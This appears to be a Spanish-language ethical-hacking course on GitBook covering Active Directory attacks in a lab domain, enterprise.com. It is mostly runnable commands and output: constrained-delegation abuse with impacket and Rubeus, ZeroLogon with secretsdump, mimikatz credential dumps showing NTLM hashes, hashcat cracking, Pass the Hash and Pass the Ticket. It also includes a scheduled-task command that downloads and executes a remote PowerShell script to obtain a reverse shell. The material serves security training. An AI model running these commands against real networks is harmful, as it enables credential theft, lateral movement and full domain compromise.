# Table of Contents - [Constrained Delegation | EH - Infraestructura](#constrained-delegation-eh-infraestructura) - [Vulnerabilidad ZEROLOGON | EH - Infraestructura](#vulnerabilidad-zerologon-eh-infraestructura) - [Configuración | EH - Infraestructura](#configuraci-n-eh-infraestructura) - [Cracking Online | EH - Infraestructura](#cracking-online-eh-infraestructura) - [Lateralización | EH - Infraestructura](#lateralizaci-n-eh-infraestructura) - [AS REP-ROASTING | EH - Infraestructura](#as-rep-roasting-eh-infraestructura) - [Kerberoasting | EH - Infraestructura](#kerberoasting-eh-infraestructura) - [Vulnerabilidades TOMCAT | EH - Infraestructura](#vulnerabilidades-tomcat-eh-infraestructura) - [Ganando Acceso | EH - Infraestructura](#ganando-acceso-eh-infraestructura) - [Examen 01 | EH - Infraestructura](#examen-01-eh-infraestructura) - [Golden Ticket | EH - Infraestructura](#golden-ticket-eh-infraestructura) - [noPAC Attack | EH - Infraestructura](#nopac-attack-eh-infraestructura) - [Enumeración en AD | EH - Infraestructura](#enumeraci-n-en-ad-eh-infraestructura) - [Reconocimiento | EH - Infraestructura](#reconocimiento-eh-infraestructura) - [DCShadow Attack | EH - Infraestructura](#dcshadow-attack-eh-infraestructura) - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks | EH - Infraestructura](#spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks-eh-infraestructura) - [Metodología | EH - Infraestructura](#metodolog-a-eh-infraestructura) - [gMSA Password Attack | EH - Infraestructura](#gmsa-password-attack-eh-infraestructura) - [DCSync Attack | EH - Infraestructura](#dcsync-attack-eh-infraestructura) --- # Constrained Delegation | EH - Infraestructura [PreviousDCShadow Attack](/ethical-infraestructura/dcshadow-attack) [NextUnconstrained Delegation](/ethical-infraestructura/unconstrained-delegation) Last updated 28 days ago [](#concepto) Concepto --------------------------- [](#preparacion-de-laboratorio) Preparacion de Laboratorio --------------------------------------------------------------- El servidor DATABASE tiene una delegación CON RESTRICCIONES hacia el servidor SERVER2. Esta configuración se realiza en el Directorio Activo. [](#abusar-del-constrained) Abusar del Constrained ------------------------------------------------------- ### [](#desde-linux) Desde Linux 1. Identificar la delegación con restricciones: Copy /home/kali # impacket-findDelegation enterprise.com/mpalomino:Password1 1. Solicito el ticket para impersonar al usuario Administrator y poder usar el ticket sobre DATABASE. Copy /home/kali # impacket-getST -spn cifs/SERVER2.enterprise.com -impersonate Administrator enterprise.com/database$ -hashes :f74c6b5678a72fbfcf2cd3243c6000f5 1. Utilizar el ticket Copy /home/kali # export KRB5CCNAME=Administrator@cifs_SERVER2.enterprise.com@ENTERPRISE.COM.ccache /home/kali # impacket-psexec -k -no-pass server2.enterprise.com ### [](#desde-windows) Desde Windows Ejecución de comandos desde el servidor DATABASE: 1. Obtener la contraseña de la cuenta de maquina DATABASE$. Copy C:\Temp\mimikatz_trunk\x64>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Jul 15 2020 16:10:52 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : DATABASE$ Domain : ENTERPRISE Logon Server : (null) Logon Time : 2/14/2025 9:53:02 AM SID : S-1-5-20 msv : [00000003] Primary * Username : DATABASE$ * Domain : ENTERPRISE * NTLM : f74c6b5678a72fbfcf2cd3243c6000f5 * SHA1 : ce8c1728f77d5421adf45ac2a9da03a91f2fcc9d tspkg : wdigest : * Username : DATABASE$ * Domain : ENTERPRISE * Password : (null) kerberos : * Username : database$ * Domain : ENTERPRISE.COM * Password : (null) ssp : credman : 1. Crear el ticket con Rubeus Copy C:\Temp\Ghostpack-CompiledBinaries>Rubeus.exe s4u /user:DATABASE$ /domain:ENTERPRISE.COM /rc4:f74c6b5678a72fbfcf2cd3243c6000f5 /impersonateuser:Administrator /msdsspn:"CIFS/SERVER2.ENTERPRISE.COM" /altservice:HOST /ptt C:\Temp\Ghostpack-CompiledBinaries>Rubeus.exe s4u /user:DATABASE$ /domain:ENTERPRISE.COM /rc4:f74c6b5678a72fbfcf2cd3243c6000f5 /impersonateuser:Administrator /msdsspn:"CIFS/SERVER2.ENTERPRISE.COM" /ptt 1. Verificamos los tickets: Copy PS C:\Users\mpalomino> klist Current LogonId is 0:0x4b87e6 Cached Tickets: (2) #0> Client: Administrator @ ENTERPRISE.COM Server: HOST/SERVER2.ENTERPRISE.COM @ ENTERPRISE.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 2/14/2025 20:40:15 (local) End Time: 2/15/2025 6:40:14 (local) Renew Time: 2/21/2025 20:40:14 (local) Session Key Type: AES-128-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: #1> Client: Administrator @ ENTERPRISE.COM Server: CIFS/SERVER2.ENTERPRISE.COM @ ENTERPRISE.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 2/14/2025 20:40:09 (local) End Time: 2/15/2025 6:40:09 (local) Renew Time: 2/21/2025 20:40:09 (local) Session Key Type: AES-128-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: 1. ingresamos al servidor: ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F8MNPZ4oH4leylFgkogLt%252Fimage.png%3Falt%3Dmedia%26token%3Df60db572-c748-4832-834d-ff22df38cc6e&width=768&dpr=4&quality=100&sign=2892c28d&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F0CEvY7nxK7abRDXZy8yT%252Fimage.png%3Falt%3Dmedia%26token%3D3bcfc2ff-5f09-462d-98ce-f70fdc7d0540&width=768&dpr=4&quality=100&sign=8ac01dd8&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FkRhtwFBnbj4cVWeVXF2f%252Fimage.png%3Falt%3Dmedia%26token%3Daa248f90-00e1-46a4-8e20-8f7d9e35be35&width=768&dpr=4&quality=100&sign=416f775&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FePhMK9eyeFdWGwYikt2s%252Fimage.png%3Falt%3Dmedia%26token%3Dd1a45311-6083-4286-84cd-85668d6b9678&width=768&dpr=4&quality=100&sign=78e2fdd8&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F6lYRfSwZPDCAZBlaId8d%252Fimage.png%3Falt%3Dmedia%26token%3D0e5b4f6b-ba87-4236-a7d7-423022ddbe75&width=768&dpr=4&quality=100&sign=25ca769c&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F0xKcqPSorkwOg8CpS0xi%252Fimage.png%3Falt%3Dmedia%26token%3Df1562403-96de-46ae-ad5b-38a9b8f04ddd&width=768&dpr=4&quality=100&sign=ed146589&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FQPdZA9yBO0PQTSIqBe18%252Fimage.png%3Falt%3Dmedia%26token%3D70278287-2e42-4797-9d2b-204a94a42be5&width=768&dpr=4&quality=100&sign=9d811b23&sv=2) --- # Vulnerabilidad ZEROLOGON | EH - Infraestructura [PreviousVulnerabilidades TOMCAT](/ethical-infraestructura/ganando-acceso/vulnerabilidades-tomcat) [NextKerberoasting](/ethical-infraestructura/kerberoasting) Last updated 1 year ago **Concepto**: Es una vulnerabilidad que apareció en el 2020 (_CVE_\-2020-1472) y afecta a los ACTIVE DIRECTORY (AD) de Microsoft Windows que no se han actualizado. **¿En que consiste la vulnerabilidad?** * Afecta a todos los Active Directory (AD): 2008, 2012, 2016, 2019. * Permite cambiar la contraseña de la cuenta MACHINE (máquina) y colocarla en vacío. * A través de la cuenta MACHINE se puede acceder con ALTOS PRIVILEGIOS (Domain Admin) al Active Directory. **¿Riesgos de explotar la vulnerabilidad?** * El AD pierde comunicación con otros servidores debido a que la cuenta MACHINE ha sido cambiada y puedo ocasionar: perdida de sincronización con otro AD. * Se puede explotar la vulnerabilidad y luego restaurar la contraseña ORIGINAL. ### [](#pasos-del-proceso-de-explotacion) Pasos del proceso de Explotación: * Identificar el AD y su nombre NETBIOS. * Identificar si es vulnerable a ZEROLOGON. * Explotar la vulnerabilidad * Extraer Usuarios y Contraseñas: /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -no-pass ENTERPRISE/WIN-NNKRL24J9US$@192.168.4.103 * Cracking OFFLINE **Concepto**: Es la obtención de contraseñas a través del proceso de REVERSING de un HASH. #### [](#que-es-un-hash) ¿Qué es un HASH? Es la obtención de un IDENTIFICADOR ÚNICO a través de la aplicación de un algoritmo de cifrado de tipo HASH. ALGORITMO("password") = HASH1 ALGORITMO("otropassword") = HASH2 #### [](#propiedades-de-un-hash) Propiedades de un HASH: * Es de fácil obtención pero difícil reversa. UNIDIRECCIONALES. * No deben COLISIONAR. Dos "palabras" diferentes no pueden brindar un mismo HASH. #### [](#tecnicas-de-cracking) Técnicas de Cracking: 1. ~Fuerza Bruta~: todas las combinaciones posibles. 2. **Diccionario**: un listado de palabras comunes. 3. **Tablas Precomputadas (Rainbow Tables)**: Base de datos de HASHES. 4. Mix entre Fuerza Bruta y Diccionario: Listado de diccionarios en KALI: #### [](#estructura-de-almacenamiento-de-contrasenas-en-windows) Estructura de almacenamiento de Contraseñas en Windows: Copy ESTRUCTURA: USUARIO : ID: LM HASH : NTLM HASH Administrador: 500: xxxxxxxxxxx404ee: werpewrkflsdflwejrjrewjrojrew opalomino : 1001 : xxxxxxxxxxx404ee: sadlsadkljerjwqeihidhiwh2bdbd Ejemplo: Administrator:500:aad3b435b51404eeaad3b435b51404ee:356d373ed52c30c97c0eb781f16cbb76::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:733b7a2ead01888656f52d23826b0dba::: martin:1604:aad3b435b51404eeaad3b435b51404ee:4fed6755410545c28b519f30e02d54a2::: enterprise.com\dbaoracle:1605:aad3b435b51404eeaad3b435b51404ee:4fed6755410545c28b519f30e02d54a2::: enterprise.com\opalomino:1606:aad3b435b51404eeaad3b435b51404ee:356d373ed52c30c97c0eb781f16cbb76::: * LM HASH: Mecanismo de almacenamiento ANTIGUO. Deshabilitado desde Windows Vista. Copy aad3b435b51404ee = VACÍO aad3b435b51404ee = VACÍO * NTLM HASH: Desde Windows Vista en adelante: Win7, Win10, Win2012, Win2016, Win2019, Win11. Copy 31d6cfe0d16ae931b73c59d7e0c089c0 = VACÍO o DESHABILITADO Herramientas: * **HASHCAT: Proceso más rápido los HASH. Soporta muchos ALGORITMOS.** * JOHN THE RIPPER * RAINBOWCRACK (RCRACK) * L0PTHCRACK (LC7, LC8) * OPCRACK * CAIN Copy /┌──(root㉿kali)-[/home/kali] └─# hashcat -m 1000 --force -a 0 -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule hash-ntlm.txt diccionario.txt --show * Pass the Hash (PTH) **Concepto**: Técnica que se utiliza para LOGEAR en el sistema a través de un HASH y no es necesario realizar el proceso de CRACKING. Copy ┌──(root㉿kali)-[~] └─# /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:356d373ed52c30c97c0eb781f16cbb76 ENTERPRISE/Administrator@192.168.4.103 Copy crackmapexec smb 192.168.4.103 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:356d373ed52c30c97c0eb781f16cbb76 -x "dir c:\\" * Restaurar la contraseña de la cuenta MACHINE [![Logo](https://github.com/fluidicon.png)GitHub - SecuraBV/CVE-2020-1472: Test tool for CVE-2020-1472GitHub](https://github.com/SecuraBV/CVE-2020-1472) [![Logo](https://hashes.com/favicon.png)Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online](https://hashes.com/en/decrypt/hash) [![Logo](https://www.onlinehashcrack.com/favicon.ico)Online Password Hash Crack - MD5 NTLM Wordpress Joomla WPA PMKID, Office, iTunes, Archive, ..](https://www.onlinehashcrack.com/) [![Logo](https://tobtu.com/favicon.ico)LM/NTLM Hash Generator - TobTu](https://tobtu.com/lmntlm.php) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FtxDgWnletyaM9Ve7GuPf%252Fimage.png%3Falt%3Dmedia%26token%3D0fe02f88-5053-4e58-a0ce-46153f0b61fb&width=768&dpr=4&quality=100&sign=3bc85b61&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F6BPUZzfndQJxauaKyvsB%252Fimage.png%3Falt%3Dmedia%26token%3D9dd085a9-5e0f-4e0f-9ae9-23a875267f9a&width=768&dpr=4&quality=100&sign=774f42d1&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FHM8JUWF2iJkAwTGN9AJb%252Fimage.png%3Falt%3Dmedia%26token%3D1922923f-42c5-4adb-b00d-7c634db7df11&width=768&dpr=4&quality=100&sign=b41d0e24&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FCtvo57biA2pk9hAoS10y%252Fimage.png%3Falt%3Dmedia%26token%3Db1b0bd86-663b-404c-a8fa-21e6329ab756&width=768&dpr=4&quality=100&sign=d97102d6&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FDzrlk0jzThk9O22wTHdm%252Fimage.png%3Falt%3Dmedia%26token%3D2b2eb30a-6e18-4e5f-aa94-c8c7db14ebdf&width=768&dpr=4&quality=100&sign=10c9674c&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FTp2mFp86l7wpaiFrSldH%252Fimage.png%3Falt%3Dmedia%26token%3D4d835f98-2f8b-4018-b90e-2f3088ea3629&width=768&dpr=4&quality=100&sign=d5a98434&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FlGo9xcOfiUWatH6gu3SW%252Fimage.png%3Falt%3Dmedia%26token%3D307381d1-9cb1-4535-8af7-9f1c9e5cec6b&width=768&dpr=4&quality=100&sign=fb455c51&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FUIFSkCn2hDzAzdEQHnnm%252Fimage.png%3Falt%3Dmedia%26token%3D87ba9f1d-ac87-403e-979c-fef6a8fc1b8c&width=768&dpr=4&quality=100&sign=e6fe5c12&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FyyJnYj14hyyB2pZv93EU%252Fimage.png%3Falt%3Dmedia%26token%3D83d5199d-bf94-4bdd-a23e-0684600398ad&width=768&dpr=4&quality=100&sign=81f5addf&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FyCh24aWYS8ib5ikqjwNd%252Fimage.png%3Falt%3Dmedia%26token%3Db120c46a-5564-4294-89fd-eb54064325d5&width=768&dpr=4&quality=100&sign=31092617&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FavWoSXAcucqZRsztMDO8%252Fimage.png%3Falt%3Dmedia%26token%3D9c85b280-5788-4698-b1e1-6554ef91dd16&width=768&dpr=4&quality=100&sign=57217ca8&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FGH0sh3bmYZEDwYAh5laq%252Fimage.png%3Falt%3Dmedia%26token%3Da0e5025e-8003-4f28-b270-5f292cfcdc52&width=768&dpr=4&quality=100&sign=3b43b466&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FYvoA3kdOMgaHJKvGML03%252Fimage.png%3Falt%3Dmedia%26token%3D3e7d1bce-f0e2-4067-898f-728fab7eb41f&width=768&dpr=4&quality=100&sign=642d9ca0&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FkeIGThBrK7nhPLTqH9uQ%252Fimage.png%3Falt%3Dmedia%26token%3D4cc65cd8-2f0d-4ac0-9b40-9d9710df33cd&width=768&dpr=4&quality=100&sign=a7f4243&sv=2) --- # Configuración | EH - Infraestructura ### [](#kali-user-kali) KALI user: kali pass: kali IP: 192.168.4.100 dhclient ifconfig eth1 192.168.4.100 netmask 255.255.255.0 up ### [](#win7) Win7 user:hacked pass:P@ssword IP: 192.168.4.101 ### [](#metasplotaible2) Metasplotaible2 user:msfadmin pass:msfadmin IP: 192.168.4.102 sudo dhclient sudo ifconfig eth0 192.168.4.102 netmask 255.255.255.0 up [PreviousMetodología](/ethical-infraestructura) [NextReconocimiento](/ethical-infraestructura/reconocimiento) Last updated 2 years ago --- # Cracking Online | EH - Infraestructura [PreviousKerberoasting](/ethical-infraestructura/kerberoasting) [NextgMSA Password Attack](/ethical-infraestructura/gmsa-password-attack) Last updated 7 months ago [](#configuracion-de-laboratorio) Configuración de Laboratorio ------------------------------------------------------------------- 1. Creación de usuarios y contraseñas [2KB\ \ Add-NewUsers.ps1](https://3741330946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKX3Vc1QrEuNFDUSnFFhR%2Fuploads%2F4cV9RLhE6GuCf0PBAO6s%2FAdd-NewUsers.ps1?alt=media&token=56cfa0df-ce23-442b-b6c8-339e90c33077) [8KB\ \ NewUsersFinal.csv](https://3741330946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKX3Vc1QrEuNFDUSnFFhR%2Fuploads%2FV70QPhqfX6gq9LJkjlNj%2FNewUsersFinal.csv?alt=media&token=f90600fa-d573-49aa-b3d2-33b35b1e0a6b) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FV5ydwGwx6lex9lHH22ZE%252Fimage.png%3Falt%3Dmedia%26token%3Dda55c35f-7db6-469f-aa06-b56133937466&width=768&dpr=4&quality=100&sign=54b96f52&sv=2) --- # Lateralización | EH - Infraestructura [](#pass-the-hash-pth) PASS THE HASH (PTH) ----------------------------------------------- La técnica "Pass the Hash" (PtH) es un método de ataque cibernético que permite a un atacante acceder a un sistema o red sin necesidad de conocer la contraseña en texto plano. En lugar de eso, el atacante utiliza el hash de la contraseña, que es una representación criptográfica de la misma. **¿Cómo funciona?** 1. **Obtención del hash:** El atacante obtiene el hash de la contraseña de un usuario, ya sea mediante malware, ingeniería social o aprovechando vulnerabilidades en el sistema. 2. **Acceso al sistema:** El atacante utiliza herramientas especializadas para "pasar el hash" al sistema objetivo. El sistema, al verificar la autenticidad del usuario, compara el hash proporcionado por el atacante con el hash almacenado en su base de datos. Si coinciden, el acceso es concedido. ### [](#ejemplo-con-mimikatz) Ejemplo con Mimikatz Ejecutamos MIMIKATZ e identificamos el HASH NTLM del usuario MPALOMINO. Copy C:\Temp\mimikatz_trunk\x64>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Jul 15 2020 16:10:52 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 28319640 (00000000:01b01f98) Session : RemoteInteractive from 10 User Name : mpalomino Domain : ENTERPRISE Logon Server : WIN-5UL7A982B9B Logon Time : 2/8/2025 12:27:17 AM SID : S-1-5-21-2289571751-832941719-1526755997-1121 msv : [00000003] Primary * Username : mpalomino * Domain : ENTERPRISE * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 * DPAPI : 5f76b160f6d8914a2fbdd862e70ab6f3 tspkg : wdigest : * Username : mpalomino * Domain : ENTERPRISE * Password : (null) kerberos : * Username : mpalomino * Domain : ENTERPRISE.COM * Password : (null) ssp : credman : * Luego se puede utilizar el HASH con diversas herramientas. Por ejemplo NETEXEC A través de MIMIKATZ: * En MIMIKATZ: Copy mimikatz # sekurlsa::pth /user:devmanager /domain:enterprise.com /ntlm:c39f2beb3d2ec06a62cb887fb391dee0 /run:powershell.exe user : devmanager domain : enterprise.com program : powershell.exe impers. : no NTLM : c39f2beb3d2ec06a62cb887fb391dee0 | PID 7896 | TID 6944 | LSA Process was already R/W | LUID 0 ; 45529397 (00000000:02b6b935) \_ msv1_0 - data copy @ 00000210530DB460 : OK ! \_ kerberos - data copy @ 0000021053CC2948 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000021053BE0FB8 (32) -> null * Se abre un powershell y podemos ejecutar comandos remotamente: Copy PS C:\Windows\system32> Invoke-Command -ComputerName Server2 -ScriptBlock { whoami } enterprise\devmanager * Obtener shell interactiva Copy Enter-PSSession -ComputerName Server2 [](#pass-the-ticket-ptt) PASS THE TICKET (PTT) --------------------------------------------------- La técnica **Pass the Ticket (PtT)** es un tipo de ataque utilizado en entornos de red que emplean el protocolo de autenticación **Kerberos**, común en sistemas Windows. Este ataque se aprovecha de los **Tickets de Kerberos** (TGT y TGS) para obtener acceso no autorizado a recursos en una red sin necesidad de conocer las credenciales de un usuario (nombre de usuario y contraseña). #### [](#en-que-consiste) ¿En qué consiste? En Kerberos, cuando un usuario se autentica, recibe un **Ticket Granting Ticket (TGT)**, que se utiliza para solicitar **Ticket Granting Service (TGS)** para acceder a servicios específicos (como servidores de archivos, bases de datos, etc.). En un ataque **Pass the Ticket**, un atacante roba o captura un ticket válido (TGT o TGS) y lo utiliza para suplantar la identidad del usuario legítimo y acceder a los recursos protegidos. * * * #### [](#como-funciona) ¿Cómo funciona? 1. **Obtención del ticket**: * El atacante puede obtener un ticket válido de varias maneras: * **Dumping de memoria**: Usando herramientas como **Mimikatz** para extraer tickets de la memoria de un sistema comprometido. * **Reutilización de tickets**: Si el atacante tiene acceso a un ticket previamente generado. 2. **Uso del ticket**: * Una vez que el atacante tiene el ticket, lo inyecta en su propia sesión utilizando herramientas como **Mimikatz** o **Rubeus**. * El sistema de autenticación Kerberos valida el ticket y concede acceso al atacante como si fuera el usuario legítimo. 3. **Acceso a recursos**: * Con el ticket válido, el atacante puede acceder a los recursos protegidos (servidores, aplicaciones, etc.) sin necesidad de conocer la contraseña del usuario. * * * ### [](#ejemplo-de-uso-de-ppt) Ejemplo de uso de PPT 1. Generar el ticket con RUBEUS Copy C:\Temp\Ghostpack-CompiledBinaries>Rubeus.exe asktgt /user:devmanager /password:Password2 /domain:enterprise.com /nowrap /outfile:ticket.kirbi 1. Importamos los tickets a MIMIKATZ. Copy mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::ptt C:\Temp\mimikatz_trunk\x64\ticket.kirbi 1. Verificamos los tickets en el sistema operativo. * Al cargar el ticket con MIMIKATZ en automático ya puedo ingresar a SERVER2 * Podemos utilizar el PROGRAMADOR DE TAREAS para tener conexión reversa. Ejemplo: Copy C:\Users\mpalomino>schtasks /create /S server2 /SC Weekly /RU "enterprise\devmanager" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.5.135/powershelloneline.ps1''')'" SUCCESS: The scheduled task "STCheck" has successfully been created. C:\Users\mpalomino>schtasks /Run /S server2 /TN "STCheck" SUCCESS: Attempted to run the scheduled task "STCheck". En KALI dejamos nuestro listener escuchando: En Server2 se creó la tarea: [PreviousUnconstrained Delegation](/ethical-infraestructura/unconstrained-delegation) [NextDCSync Attack](/ethical-infraestructura/dcsync-attack) Last updated 1 month ago ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FlBhFTKlYHRJ0BKyvUnT9%252Fimage.png%3Falt%3Dmedia%26token%3D96313021-bc8a-4c67-b1eb-99856f730a49&width=768&dpr=4&quality=100&sign=d32fdf47&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FbmZTJaREtbh8GUmnyWA4%252Fimage.png%3Falt%3Dmedia%26token%3Def0e4149-46d9-4322-b489-217a20e61bd2&width=768&dpr=4&quality=100&sign=49bfed80&sv=2) 